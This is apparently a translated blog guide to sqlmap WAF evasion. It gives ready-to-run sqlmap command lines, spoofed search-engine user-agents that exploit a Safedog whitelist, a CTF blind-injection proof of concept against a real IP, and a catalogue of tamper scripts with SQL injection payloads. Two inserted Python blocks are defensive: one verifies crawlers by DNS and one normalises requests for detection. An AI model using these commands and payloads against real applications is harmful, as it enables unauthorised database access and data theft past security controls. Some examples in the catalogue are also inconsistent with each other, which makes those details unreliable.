sqlmap tamper scripts: advanced use against applications

Commonly used commands

  • Safedog detection (--tamper "safedog2.py")
    py -2 sqlmap.py --random-agent --tamper "safedog2.py" --batch -r

  • Safedog full detection: add --level 5 --risk 3
    py -2 sqlmap.py --random-agent --tamper "safedog2.py" --batch --level 5 --risk 3 -r

  • Safedog full detection with delays: add
    --delay 2 delay between requests
    --timeout=60 seconds to wait before a connection times out (default 30)
    --time-sec=60 seconds of delay expected in time-based responses (default 5)
    py -2 sqlmap.py --random-agent --tamper "safedog2.py" --batch --delay 2 --time-sec=60 --timeout=60 --level 5 --risk 3 -r

Common commands for MySQL targets

  • Quick check with --tamper "bluecoat.py"
    py -2 sqlmap.py --random-agent --tamper "bluecoat.py" --dbms Mysql --batch -r

  • Delay plus timeout
    py -2 sqlmap.py --random-agent --tamper "bluecoat.py" --dbms Mysql --batch --delay 2 --timeout=11 -r

  • Full SQL check (the quick check plus --level 5 --risk 3) with bluecoat.py
    py -2 sqlmap.py --random-agent --tamper "bluecoat.py" --dbms Mysql --batch --level 5 --risk 3 -r

Speed things up by specifying the database type:

--dbms Oracle
--dbms Mysql
--dbms "Microsoft Access"

Practice injection yourself

  • DVWA practice system

  • (MySQL + PHP environment) the PHP statement

$sql="SELECT * FROM users WHERE id='$id'LIMIT 0,1"; # only one record is queried

...

Bypassing the WAF

Safedog and similar products.

  • Clear the cookies
    After capturing the request, if the cookies are not needed, clear them and save the request as x.txt
    then use -r x.txt in sqlmap

  • --timeout=10 connection timeout in seconds

  • --ignore-proxy ignore the system's default HTTP proxy

  • --delay=2 wait 2 seconds between HTTP requests

  • Random user-agent
    add the --random-agent option

  • Specific user-agent
    Search-engine crawler user-agents are whitelisted in Safedog!

MSN crawler
--user-agent "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
Yahoo crawler
--user-agent "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

Other user-agents:
Android phone
user-agent (UA captured after Burp's automatic replacement)
--user-agent "Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
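The whitelist just described is the weak point: a User-Agent string is chosen by the client, so exempting "crawler" traffic on that string alone exempts anyone who copies it. The following is an added example (not from the original post, from Safedog or from any search engine) showing how a WAF or origin server should confirm a self-declared crawler before trusting it: reverse-resolve the client IP, require the name to fall inside the crawler's published domain, then forward-resolve that name and require it to map back to the same IP. The DNS tables, IP addresses, host names and the suffix table are constructed or assumed for this example and stand in for live lookups.

```python
# Constructed DNS tables so the check runs offline; the addresses are from the
# documentation ranges and the host names are invented for this example.
PTR_RECORDS = {
    "198.51.100.10": "msnbot-198-51-100-10.search.msn.com",  # consistent crawler host
    "198.51.100.11": "crawler.search.msn.com",                # PTR claims msn, A record disagrees
    "198.51.100.20": "llf520064.crawl.yahoo.net",             # consistent Yahoo crawler host
    "203.0.113.5": "vps-5.example.net",                       # ordinary host sending a crawler UA
}
A_RECORDS = {
    "msnbot-198-51-100-10.search.msn.com": {"198.51.100.10"},
    "crawler.search.msn.com": {"198.51.100.99"},
    "llf520064.crawl.yahoo.net": {"198.51.100.20"},
    "vps-5.example.net": {"203.0.113.5"},
}

# User-Agent token -> DNS suffix the crawler's hosts must resolve into.
# Assumption: these follow the vendors' published verification guidance; keep the
# table in configuration and review it rather than treating it as a fixed fact.
CRAWLER_SUFFIXES = {
    "msnbot": ".search.msn.com",
    "bingbot": ".search.msn.com",
    "Yahoo! Slurp": ".crawl.yahoo.net",
}

MSNBOT_UA = "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
SLURP_UA = "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"


def ua_only_whitelist(user_agent: str) -> bool:
    """The weak check: trust whatever the client says it is."""
    return any(token in user_agent for token in CRAWLER_SUFFIXES)


def claimed_suffix(user_agent: str):
    """DNS suffix implied by the crawler token in the UA, or None if no claim is made."""
    for token, suffix in CRAWLER_SUFFIXES.items():
        if token in user_agent:
            return suffix
    return None


def verify_crawler(user_agent: str, client_ip: str,
                   ptr_lookup=PTR_RECORDS.get,
                   a_lookup=lambda host: A_RECORDS.get(host, set())) -> bool:
    """Reverse-then-forward DNS confirmation of a self-declared crawler.
    For production use swap in real resolvers (socket.gethostbyaddr for the
    PTR step, socket.gethostbyname_ex for the forward step)."""
    suffix = claimed_suffix(user_agent)
    if suffix is None:
        return False                      # no crawler claim, nothing to exempt
    host = ptr_lookup(client_ip)
    if not host or not host.endswith(suffix):
        return False                      # reverse lookup is not in the crawler's domain
    return client_ip in a_lookup(host)    # forward-confirm: the name must map back to this IP


if __name__ == "__main__":
    for ip in ("198.51.100.10", "198.51.100.11", "203.0.113.5", "192.0.2.1"):
        print(ip, "ua-only:", ua_only_whitelist(MSNBOT_UA),
              "verified:", verify_crawler(MSNBOT_UA, ip))
```

The second table entry is the case a PTR-only check misses: anyone who controls reverse DNS for their own address range can make it answer `crawler.search.msn.com`, and only the forward lookup exposes that the name does not resolve back to the client. Cache the verdict per IP; the two lookups are too slow to repeat on every request.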

Tamper

Spaces filtered?
1. Try the commonly used characters such as %a0 and %0b; if they don't work,
2. use parentheses () instead to get the effect of a space

[Huashan Cup CTF] Web 4: how do you inject when there is a WAF?
Nothing else in union select was filtered, but union never produced a displayed column, so the only option left was blind injection
id=1e0and(ascii(substr(database(),1,1))>1)

At first I assumed cross-table queries were impossible and started brute-forcing columns, but the same table only yielded two columns, Name and id
Since the column wasn't in the same table, the only option left was to try going cross-table
The PoC was constructed as follows:
http://218.245.4.113:8080/web04/60c2a013a6decbe0c5c2883080e6b332/index.php?id=1e0and(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{},1))={})'.format(i,d)
That recovered the database name, tables and columns; in the end both the table and the column turned out to be flag.....

For all databases

base64encode.py, apostrophemask.py / apostrophenullencode.py

  • Oracle
    greatest.py

  • MSSQL

  • MySQL
    greatest.py
    [MySQL only] bluecoat.py (equaltolike.py plus spaces replaced by other blank characters)

  • Microsoft SQL Server
    equaltolike.py

  • PostgreSQL
    greatest.py

  • Microsoft Access

Replacing spaces
space2dash.py


All scripts

apostrophemask.py replaces the single quote ' with %EF%BC%87 (its UTF-8 full-width counterpart)

apostrophenullencode.py replaces the single quote ' with %00%27 (%00%27 is the illegal double-unicode counterpart of the single quote ')

appendnullbyte.py appends an encoded null byte, %00, to the end of the payload; aimed at WAFs in front of [Access] databases

base64encode.py Base64-encodes all characters of the given payload

between.py replaces the greater-than sign > with "NOT BETWEEN 0 AND #" and the equals sign = with "BETWEEN # AND #"  [mssql oracle mysql postgreSQL]

bluecoat.py replaces the space after an SQL statement with a valid random blank character, then replaces the equals sign = with "LIKE"  [mysql]

charencode.py URL-encodes all characters of the given payload once (already-encoded characters are not processed)  [mssql oracle mysql postgreSQL]

chardoubleencode.py double URL-encodes all characters of the given payload (already-encoded characters are not processed)

charunicodeencode.py Unicode-URL-encodes the non-encoded characters of the given payload (already-encoded characters are not processed)  [mssql oracle mysql postgreSQL]

concat2concatws.py replaces instances like "CONCAT(A, B)" with "CONCAT_WS(MID(CHAR(0), 0, 0), A, B)"

equaltolike.py replaces every equals sign = in the payload with the LIKE operator; used to bypass weak and bespoke WAFs that only filter the equals sign =

halfversionedmorekeywords.py adds a versioned MySQL comment, i.e. the three characters /*!, before each keyword  [mysql] WAF bypass

greatest.py replaces the greater-than sign > with the "GREATEST" function to get past WAFs that block >

versionedkeywords.py encloses each non-function keyword in a MySQL versioned comment, e.g. /*!UNION*/  [mysql]

ifnull2ifisnull.py replaces instances like "IFNULL(A, B)" with "IF(ISNULL(A), B, A)"

lowercase.py replaces each keyword character with its lowercase value

modsecurityversioned.py embraces the complete query with a versioned comment

modsecurityzeroversioned.py embraces the complete query with a zero-versioned comment

multiplespaces.py adds multiple spaces around SQL keywords

nonrecursivereplacement.py replaces predefined SQL keywords with representations suitable for non-recursive replacement filters

overlongutf8.py converts all characters in the given payload (to overlong UTF-8)

percentage.py adds a percent sign % in front of each character

randomcase.py randomly changes the case of each keyword character

randomcomments.py inserts random comments into SQL keywords

securesphere.py appends a specially crafted string

sp_password.py appends "sp_password" to the end of the payload for automatic obfuscation from DBMS logs

space2comment.py replaces the space character with "/**/"

space2dash.py replaces the space character with a dash comment "--" followed by a random string and a new line

space2hash.py replaces the space character with a pound character "#" followed by a random string and a new line

space2morehash.py replaces the space character with a pound character "#" followed by a random string and a new line

space2mssqlblank.py replaces the space character with a random blank character from a valid set of alternate characters

space2mssqlhash.py replaces the space character with a pound character "#" followed by a new line

space2mysqlblank.py replaces the space character with a random blank character from a valid set of alternate characters

space2mysqldash.py replaces the space character with a dash comment "--" followed by a new line

space2plus.py replaces the space character with a plus sign "+"

space2randomblank.py replaces the space character with a random blank character from a valid set of alternate characters

unionalltounion.py replaces "UNION ALL SELECT" with "UNION SELECT"

unmagicquotes.py replaces the quote character with the multi-byte combination %bf%27 together with a generic comment at the end (wide-character bypass of GPC addslashes)

varnish.py adds an HTTP header "X-originating-IP" to bypass the WAF

versionedmorekeywords.py encloses each keyword in a MySQL versioned comment

xforwardedfor.py adds a fake HTTP header "X-Forwarded-For" with a random IP (randomIP()) in an attempt to bypass the WAF
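Every entry in this list is a presentation trick: the SQL the database executes is unchanged, only the bytes the WAF sees differ. A rule engine that matches on the raw request is therefore beaten by any encoding, comment or whitespace variant it did not anticipate. As an added example (not part of the original post and not sqlmap's or any WAF vendor's code), the following Python normaliser undoes the transformations catalogued above to produce canonical text that rules can be run over: it decodes %XX and %uXXXX layers until nothing changes, folds full-width characters, drops NUL bytes, strips comment forms including MySQL versioned comments, maps alternate blanks to a space, collapses whitespace and lower-cases. The detection rules and the sample inputs are constructed for the example; the samples reuse the tamper outputs quoted in this post.

```python
import re
import unicodedata
from urllib.parse import unquote

# Blanks that the space2*blank scripts substitute for ' ' (the ASCII tables quoted on
# this page), the %A0 from the space2mysqlblank example and '+' from space2plus.py.
ALT_BLANKS = "\t\n\x0b\x0c\r\x01\x02\x03\x04\x05\x06\x07\x08\x0e\x0f\xa0+"
_BLANK_MAP = {ord(c): " " for c in ALT_BLANKS}

# Detection rules, constructed for this example and applied only after normalisation.
RULES = {
    "union-select": re.compile(r"\bunion\b.*\bselect\b"),
    "select-from": re.compile(r"\bselect\b.*\bfrom\b"),
    "tautology": re.compile(
        r"\b(and|or)\s+['\"]?\w+['\"]?\s*(=|like\b|not\s+between\b|between\b)"),
}


def decode_layers(value: str, rounds: int = 3) -> str:
    """Undo %uXXXX (charunicodeencode.py) and repeated %XX encoding (charencode.py,
    chardoubleencode.py) until the value stops changing, bounded by `rounds`."""
    for _ in range(rounds):
        nxt = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), value)
        nxt = unquote(nxt, errors="replace")
        if nxt == value:
            break
        value = nxt
    return value


def strip_comments(value: str, empty_comment: str) -> str:
    """Remove the comment forms the space2comment, versioned*, modsecurity* and
    space2hash/space2dash families rely on. `empty_comment` decides whether /**/
    counts as a blank or as nothing, because parsers differ on that."""
    # /*!NNNNN body */ executes its body on MySQL, so the body must survive.
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    # Ordinary /* ... */ comments.
    value = re.sub(r"/\*.*?\*/", empty_comment, value, flags=re.S)
    # Unterminated /*!0 openers produced by halfversionedmorekeywords.py.
    value = re.sub(r"/\*!\d*", " ", value)
    # Line comments that end at a newline: '#...\n' and '--...\n'.
    value = re.sub(r"(#|--)[^\n]*\n", " ", value)
    return value


def normalize(raw: str) -> list:
    """Return the candidate plaintexts a rule engine should inspect for `raw`."""
    value = decode_layers(raw)
    value = unicodedata.normalize("NFKC", value)  # U+FF07 -> ' (apostrophemask.py)
    value = value.replace("\x00", "")             # %00 from apostrophenullencode/appendnullbyte
    variants = []
    for empty_comment in (" ", ""):
        v = strip_comments(value, empty_comment)
        v = v.translate(_BLANK_MAP)                 # alternate blanks and '+' -> ' '
        v = re.sub(r"\s+", " ", v).strip().lower()  # multiplespaces.py, randomcase.py
        variants.append(v)
    return variants


def classify(raw: str):
    """Name of the first rule that fires on any normalised variant, else None."""
    for variant in normalize(raw):
        for name, rule in RULES.items():
            if rule.search(variant):
                return name
    return None


# Constructed samples, taken from the tamper outputs quoted on this page.
SAMPLES = [
    "%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545",
    "1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227",
    "1 AND %EF%BC%871%EF%BC%87=%EF%BC%871",
    "SELECT%0Eid%0DFROM%07users",
    "1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/",
    "hello%20world",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample[:40]!r:45} -> {classify(sample)}")
```

A detection layer that stops after one URL-decode pass misses the first sample; one that never folds Unicode misses the third; one that treats only 0x20 as whitespace misses the fourth. Tokenising the decoded text the way a SQL parser would is more robust than regexes, but the fixed-point decoding and comment handling above are the minimum a signature-based engine needs, and the two comment variants are there because `/**/` is a token separator to some parsers and invisible to others.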


sqlmap

An automated SQL injection tool
Its main functions are scanning for, discovering and exploiting SQL injection vulnerabilities in a given URL.

Databases supported by sqlmap

MySQL
Oracle
PostgreSQL
Microsoft SQL Server
Microsoft Access
DB2
SQLite
Firebird
Sybase
SAP MaxDB

sqlmap uses four distinct SQL injection techniques
Blind inference SQL injection
UNION query SQL injection
Stacked queries
Time-based blind SQL injection

Its extensive features and options include:
database fingerprinting, enumeration, data extraction, access to the target file system, and execution of arbitrary commands when full operating privileges are obtained.

Using the tamper scripts in sqlmap makes an attack more efficient
Most of the plugins in the tamper directory are introduced below

Against a WAF: quick reference

1. The equals sign = is filtered

The script equaltolike.py works for the following databases
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5

The script space2dash.py works for the following databases
MSSQL
SQLite

space2hash.py %23<random string>%0A

apostrophemask.py

Effect: replaces the single quote ' with its UTF-8 full-width counterpart %EF%BC%87
(UTF-8 is the most widely used encoding of Unicode!)
Example:
1 AND '1'='1
1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

Description from the original file: (the "apostrophe character" is the single quote)
Replaces apostrophe character with its UTF-8 full width counterpart

References:
    * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
    * http://lukasz.pilorz.net/testy/unicode_conversion/
    * http://sla.ckers.org/forum/read.php?13,11562,11850
    * http://lukasz.pilorz.net/testy/full_width_utf/index.phps

>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

equaltolike.py

Effect: replaces the equals sign = with LIKE; this script is used to bypass weak and bespoke WAFs (that only filter the equals sign =)
Example:

  • Input: SELECT * FROM users WHERE id=1
  • Output: SELECT * FROM users WHERE id LIKE 1

Description from the original file:
Replaces all occurances of operator equal ('=') with operator 'LIKE'

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5

Notes:
    * Useful to bypass weak and bespoke web application firewalls that
      filter the equal character ('=')
    * The LIKE operator is SQL standard. Hence, this tamper script
      should work against all (?) databases

>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'

Case 1: http://www.wooyun.org/bugs/wooyun-2010-087296
Case 2: http://www.wooyun.org/bugs/wooyun-2010-074790
Case 3: http://www.wooyun.org/bugs/wooyun-2010-072489

space2dash.py

Effect: bypasses filtering of the equals sign =
Concretely it replaces each space with the comment marker -- followed by a random string and then a newline \n
The URL-encoded value of a linefeed is %0A (Baidu Baike: URL encoding)

Example:
'1 AND 9227=9227'
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
Broken apart to show what happens: each space becomes --<random string>%0A
'1--nVNaVoPYeva%0A
AND--ngNvzqu%0A
9227=9227'

Description from the original file:
Replaces space character (' ') with a dash comment ('--') followed by
a random string and a new line ('\n')

Requirement:
    * MSSQL
    * SQLite

Notes:
    * Useful to bypass several web application firewalls
    * Used during the ZeroNights SQL injection challenge,
      https://proton.onsec.ru/contest/

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

Case 1: http://www.wooyun.org/bugs/wooyun-2010-062878

greatest.py

Effect: bypasses filtering of >; concretely it replaces the greater-than sign > with GREATEST
Example:
('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'

Description from the original file:
Replaces greater than operator ('>') with 'GREATEST' counterpart

Tested against:
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass weak and bespoke web application firewalls that
      filter the greater than character
    * The GREATEST clause is a widespread SQL command. Hence, this
      tamper script should work against majority of databases

>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'

space2hash.py

[For MySQL 4.0, 5.0]
Effect: replaces each space with the # character %23, a random string and a newline %0A
Example:

  • Input: 1 AND 9227=9227
  • Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
    Broken apart to show what happens: each space becomes %23xxxxx%0A
    1
    %23PTTmJopxdWJ%0A
    AND
    %23cWfcVRPV%0A
    9227=9227

Description from the original file:
Replaces space character (' ') with a pound character ('#') followed by
a random string and a new line ('\n')

Requirement:
    * MySQL

Tested against:
    * MySQL 4.0, 5.0

Notes:
    * Useful to bypass several web application firewalls
    * Used during the ModSecurity SQL injection challenge,
      http://modsecurity.org/demo/challenge.html

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'

apostrophenullencode.py

Effect: bypasses filtering of the single quote ' by replacing it with %00%27 (%00%27 is the illegal double-unicode counterpart of the single quote ')
Example:
tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
Broken apart to show what happens:
'1 AND
%00%27
1
%00%27
=
%00%27
1'

Description from the original file:
Replaces apostrophe character with its illegal double unicode counterpart

>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'

halfversionedmorekeywords.py

Effect: adds a versioned MySQL comment, i.e. the three characters /*!, before each keyword  [mysql] WAF bypass

Example:
"value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
Broken apart to show what happens:
"value'
/*!0
UNION
/*!0
ALL
/*!0
SELECT
/*!0
CONCAT(
/*!0
CHAR(58,107,112,113,58),
/*!0
IFNULL(CAST(
/*!0
CURRENT_USER()
/*!0
AS
/*!0
CHAR),
/*!0
CHAR(32)),
/*!0
CHAR(58,97,110,121,58)),
/*!0
NULL,
/*!0
NULL#
/*!0
AND 'QDWa'='QDWa"

Explanation of /*! ... */ statements, from the web
The MySQL server includes some extensions that other SQL DBMSs lack.
If a version number is added after the "!" character, the syntax inside the comment is executed only when the MySQL version is >= the specified version number:
CREATE /*!32302 TEMPORARY */ TABLE t (c INT);
This means that if your version is 3.23.02 or higher, the MySQL server will use the TEMPORARY keyword.

Description from the original file:
Adds versioned MySQL comment before each keyword

Requirement:
    * MySQL < 5.1

Tested against:
    * MySQL 4.0.18, 5.0.22

Notes:
    * Useful to bypass several web application firewalls when the
      back-end database management system is MySQL
    * Used during the ModSecurity SQL injection challenge,
      http://modsecurity.org/demo/challenge.html

>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

space2morehash.py

Effect: replaces each space with a # character, a random string and a newline %0A
Example:

  • Input: 1 AND 9227=9227
  • Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
    Broken apart to show what happens:
    1
    %23PTTmJopxdWJ%0A
    AND
    %23cWfcVRPV%0A
    9227=9227

Description from the original file:
Replaces space character (' ') with a pound character ('#') followed by
a random string and a new line ('\n')

Requirement:
    * MySQL >= 5.1.13

Tested against:
    * MySQL 5.1.41

Notes:
    * Useful to bypass several web application firewalls
    * Used during the ModSecurity SQL injection challenge,
      http://modsecurity.org/demo/challenge.html

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'

appendnullbyte.py

Effect: appends an encoded null byte, %00, to the end of the payload; may work against WAFs in front of an Access database
Example:
'1 AND 1=1'
'1 AND 1=1%00'

Comment markers in SQL statements:
Access has no dedicated comment marker (none of /* */, -- or # work), but the NUL character (URL-encoded as %00) can be used
e.g. ' UNION SELECT Count(*) FROM admin%00

Description from the original file:
Appends encoded NULL byte character at the end of payload

Requirement:
    * Microsoft Access

Notes:
    * Useful to bypass weak web application firewalls when the back-end
      database management system is Microsoft Access - further uses are
      also possible

Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection

>>> tamper('1 AND 1=1')
'1 AND 1=1%00'

ifnull2ifisnull.py

Effect: bypasses filtering of IFNULL by replacing IFNULL(A, B) with IF(ISNULL(A), B, A)
Example:
'IFNULL(1, 2)'
'IF(ISNULL(1),2,1)'

Description from the original file:
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'

Requirement:
    * MySQL
    * SQLite (possibly)
    * SAP MaxDB (possibly)

Tested against:
    * MySQL 5.0 and 5.5

Notes:
    * Useful to bypass very weak and bespoke web application firewalls
      that filter the IFNULL() function

>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'

space2mssqlblank.py (mssql)

Effect: replaces each space with a random blank character (from a valid set of alternate blank characters)

Example:
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Eid%0DFROM%07users'

Case 1:
http://www.wooyun.org/bugs/wooyun-2010-062878

Description from the original file:
"""
Replaces space character (' ') with a random blank character from a
valid set of alternate characters

Requirement:
    * Microsoft SQL Server

Tested against:
    * Microsoft SQL Server 2000
    * Microsoft SQL Server 2005

Notes:
    * Useful to bypass several web application firewalls

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Eid%0DFROM%07users'
"""

# ASCII table:
#   SOH     01      start of heading
#   STX     02      start of text
#   ETX     03      end of text
#   EOT     04      end of transmission
#   ENQ     05      enquiry
#   ACK     06      acknowledge
#   BEL     07      bell
#   BS      08      backspace
#   TAB     09      horizontal tab
#   LF      0A      new line
#   VT      0B      vertical TAB
#   FF      0C      new page
#   CR      0D      carriage return
#   SO      0E      shift out
#   SI      0F      shift in

base64encode.py

Effect: Base64-encodes the payload characters (Base64 all characters in a given payload)

Example: ("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='

Requirement: all

Case 1:
http://www.wooyun.org/bugs/wooyun-2010-060071
Case 2:
http://www.wooyun.org/bugs/wooyun-2010-021062
Case 3:
http://www.wooyun.org/bugs/wooyun-2010-043229

space2mssqlhash.py

Effect: replaces each space with a # character followed by a newline \n
Concretely %20 becomes %23%0A

Example:
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'

Description from the original file:
"""
Replaces space character (' ') with a pound character ('#') followed by
a new line ('\n')

Requirement:
    * MSSQL
    * MySQL

Notes:
    * Useful to bypass several web application firewalls

>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
"""

modsecurityversioned.py

Effect: embraces the complete query (with a MySQL versioned comment)

For when spaces are filtered

Example:
>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'

Description from the original file:

"""
    Embraces complete query with versioned comment

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0

    Notes:
        * Useful to bypass ModSecurity WAF/IDS

    >>> import random
    >>> random.seed(0)
    >>> tamper('1 AND 2>1--')
    '1 /*!30874AND 2>1*/--'
"""

space2mysqlblank.py

Effect: replaces each space with a random blank character (from a valid set of alternate blank characters)

Example:

  • Input: SELECT id FROM users
  • Output: SELECT%0Bid%0BFROM%A0users

Case 1:
http://www.wooyun.org/bugs/wooyun-2010-076735

Description from the original file:
"""
Replaces space character (' ') with a random blank character from a
valid set of alternate characters

Requirement:
    * MySQL

Tested against:
    * MySQL 5.1

Notes:
    * Useful to bypass several web application firewalls

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Bid%0DFROM%0Cusers'
"""

# ASCII table:
#   TAB     09      horizontal TAB
#   LF      0A      new line
#   FF      0C      new page
#   CR      0D      carriage return
#   VT      0B      vertical TAB        (MySQL and Microsoft SQL Server only)

between.py

Effect: replaces > < = with BETWEEN; e.g. "> 2" becomes "NOT BETWEEN 0 AND 2"

Example:
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'

Case 1:
http://www.wooyun.org/bugs/wooyun-2010-068815

Description from the original file:
"""
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
Replaces equals operator ('=') with 'BETWEEN # AND #'

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass weak and bespoke web application firewalls that
      filter the greater than character
    * The BETWEEN clause is SQL standard. Hence, this tamper script
      should work against all (?) databases

>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
"""

space2mysqldash.py (note: the earlier one was for MSSQL, this one is for MySQL)

Effect: replaces each space with a dash comment -- followed by a newline \n
Concretely a space becomes --\n
Example:
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'

Description from the original file:
"""
Replaces space character (' ') with a dash comment ('--') followed by
a new line ('\n')

Requirement:
    * MySQL
    * MSSQL

Tested against:

Notes:
    * Useful to bypass several web application firewalls.

>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
"""

multiplespaces.py

Effect: adds multiple spaces around SQL keywords
Concretely one space becomes several spaces
Example:
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1    UNION     SELECT   foobar'

Case 1:
http://www.wooyun.org/bugs/wooyun-2010-072489

Description from the original file:
"""
Adds multiple spaces around SQL keywords

Notes:
    * Useful to bypass very weak and bespoke web application firewalls
      that has poorly written permissive regular expressions

Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1    UNION     SELECT   foobar'

"""

space2plus.py

Effect: replaces each space with a plus sign +
Example: ('SELECT id FROM users')
'SELECT+id+FROM+users'

Description from the original file:
"""
Replaces space character (' ') with plus ('+')

Notes:
    * Is this any useful? The plus get's url-encoded by sqlmap engine
      invalidating the query afterwards
    * This tamper script works against all databases

>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
"""

bluecoat.py

Effect: replaces the space after an SQL statement with a valid random blank character, then replaces = with LIKE

>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'

Description from the original file:

"""
Replaces space character after SQL statement with a valid random blank character.
Afterwards replace character = with LIKE operator

Requirement:
    * Blue Coat SGOS with WAF activated as documented in
    https://kb.bluecoat.com/index?page=content&id=FAQ2147

Tested against:
    * MySQL 5.1, SGOS

Notes:
    * Useful to bypass Blue Coat's recommended WAF rule configuration

>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
"""

nonrecursivereplacement.py

Effect: doubled-up query statement (each keyword is written inside a copy of itself)
Aimed at non-recursive replacement (web applications that do a single, simple replacement of SQL keywords).
Such programs replace e.g. "SELECT" with "" only once

Description from the original file:
"""
Replaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace("SELECT", "")) filters

Notes:
    * Useful to bypass very weak custom filters

>>> random.seed(0)
>>> tamper('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
"""

space2randomblank.py

Effect: replaces each space character with a random blank character (from a valid set of alternate blank characters)

>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'

Description from the original file:
"""
Replaces space character (' ') with a random blank character from a
valid set of alternate characters

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass several web application firewalls

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
"""

# ASCII table:
#   TAB     09      horizontal TAB
#   LF      0A      new line
#   FF      0C      new page
#   CR      0D      carriage return

sp_password.py

Effect: appends sp_password to the end of the payload (for automatic obfuscation from DBMS logs), hiding it from the T-SQL log.

>>> tamper('1 AND 9227=9227-- ')
